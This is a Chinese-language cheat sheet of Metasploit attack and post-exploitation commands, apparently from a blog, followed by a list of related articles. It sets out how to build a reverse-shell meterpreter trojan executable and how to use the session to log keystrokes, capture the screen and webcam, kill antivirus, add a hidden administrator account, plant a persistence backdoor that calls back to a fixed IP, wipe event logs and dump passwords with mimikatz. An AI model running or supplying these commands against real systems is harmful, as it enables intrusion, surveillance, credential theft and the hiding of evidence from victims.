msf渗透命令和后渗透攻击
msf 常用命令
可渗透win10
msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=本机ip LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 文件名.exe 生成木马
msfconsole
use exploit/multi/handler 利用模块
show targets 查看这个模块适用于哪些机型
set payload windows/meterpreter/reverse_tcp 使用该模块
show options #查看还需要设置什么
set lhost 本机ip #设置本机ip
exploit #攻击
screenshot #屏幕截图
screenshare #实时观看
shell #打开目标cmd
keyscan_start #开启键盘监听
keyscan_dump #查看监听记录
keyscan_stop #停止监听
uictl disable keyboard/mouse #禁用键盘/鼠标
uictl enable keyboard/mouse #启用键盘/鼠标制权
getsystem #提权
upload a.exe c:/ #上传文件到c:/
download c:\\a.exe /root/ #下载文件到root目录
ps #查看进程
kill 2312 #关闭pid为2312的进程
webcam_list #列举摄像头
webcam_snap #通过远程连接目标系统的摄像头
run killav #关闭对方的杀软
run getgui -e -u Venus -p 123456 #启动rdp新建用户
net user admin 123456 /add #新建一个用户名admin 密码123456的用户
net user admin$ 123456 /add # 创建一个隐藏用户
net localgroug administrators admin /add #加入管理员权限
run persistence -X -i 5 -p 8888 -r 192.168.1.11 #生成一个持续性后门
clearev #删除日志文件
cmd 里输入systeminfo命令 #可以查看打了哪些补丁等等
explorer.exe ::{645FF040-5081-101B-9F08-00AA002F954E} #打开回收站
dir c:\ d:\ e:\ /s /b | find "password.txt" # 全盘搜索文件
拿密码
进去meterpreter后getuid一下(其实这个也没多大用处,进入meterpreter模式下 大部分情况下是拥有system权限,无需get system,但可能有些权限管理员的不一样)
1.getuid 获取系统管理员权限
2.load mimikatz mimikatz模块
3.msv 获取登入密码的hash值
4.kerberos 获取明文密码拿到登入的明文密码了不过也有一些特殊的情况,例如这样kerberos 不显示哈希值使用另一种方式获取哈希值mimikatz_command -f samdump::hashes跟具上面的方法获取明文密码1. mimikatz_command -f sekurlsa::searchPasswords2. mimikatz_command -f sekurlsa::searchPasswords更简洁的方法,就是wdigest命令了,这个命令呢,没有上面的复杂,加载模块后直接调用这个wdigest还有一个wdigest一样牛的就是tspkg
msf渗透命令和后渗透攻击相关推荐
- 渗透测试-[Meterpreter后渗透25招]
渗透测试-[后渗透25招] 0.实验环境 1.MS08-067漏洞描述[RPC] 2.主机发现 3 利用MSF通过ms08-067漏洞渗透目标系统 4.后渗透利用 4.1.系统信息搜集 (1)获取系统 ...
- 内网渗透之某后渗透利用【网络安全】
0x01 工具介绍 工具原理 Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程 ...
- 内网渗透-Metasploit之——基本后渗透命令
Metasploit之--基本后渗透命令 文章目录 Metasploit之--基本后渗透命令 前言 1.帮助菜单 2.后渗透命令 3.机器ID和UUID命令 4.通信信道的操作 5.获取用户名和进程信 ...
- [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- [网络安全提高篇] 一〇三.Metasploit后渗透技术之信息收集、权限提权和功能模块
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- MSF(六):后渗透
后渗透测试 安全牛学习Metasploit Framework笔记 一.已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二.基于已有session扩大战果 ...
- 永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
环境部署 靶机:win7(172.168.100.158) 工具机:kali,nessus 攻击步骤 1.nessus扫描靶机 2.根据扫描结果查看靶机漏洞 3.发现靶机存在永恒之蓝(MS17-010 ...
- 如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~)
如何黑掉一个宇宙?一文带你详解Meterpreter后渗透模块攻击(文末赠送免费资源哦~) 文末赠送超级干货哈 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料 ...
- MSF后渗透模块Meterpreter
目录 后门 persistence metsvc 图形界面 getgui 信息收集 判断目标是不是虚拟机 arp主机发现 nmap主机发现 dumplink-最近访问的文件记录 enum_applic ...
最新文章
- 基于OpenPose的人体姿态检测两个群众
- 【Thinkphp 5】 整合邮箱类 phpmailer实现邮件发送
- c#下实现GUI编程_程序员会懂的冷笑话:各大编程语言的内心独白
- 迷宫寻宝(一) ---- 状态压缩
- 【BZOJ1452】[JSOI2009]Count(树状数组)
- fate服务器维护,活动维护公告(2020年4月1日 14时)
- 调用WindowsAPI显示帮助提示
- unityios开发--加载视频以及加载完成之后自动跳转 .
- 保护导师,从我做起;爱护博导,人人有责
- 《企业大数据系统构建实战:技术、架构、实施与应用》——第1章 企业大数据战略定位 1.1 宏观...
- g++ -std=c++_在C ++ std库中使用sort()
- sql2000下 分页存储过程(一)
- Pycharm设置快捷键放大缩小字体
- 现今活跃在信息技术领域的卓越作者--张亚飞新作上市
- Kernel: printk: pr_debug:动态日志打印功能
- python取值范围到无穷大_python的特殊数字类型(无穷大、无穷小等)
- Python守护进程命令,再也不怕被整蛊了!
- 03 为什么 React 16 要更改组件的生命周期?(下)
- scrapy遇上ajax,抓取QQ音乐周杰伦专辑与歌词(6)
- Godaddy申请退款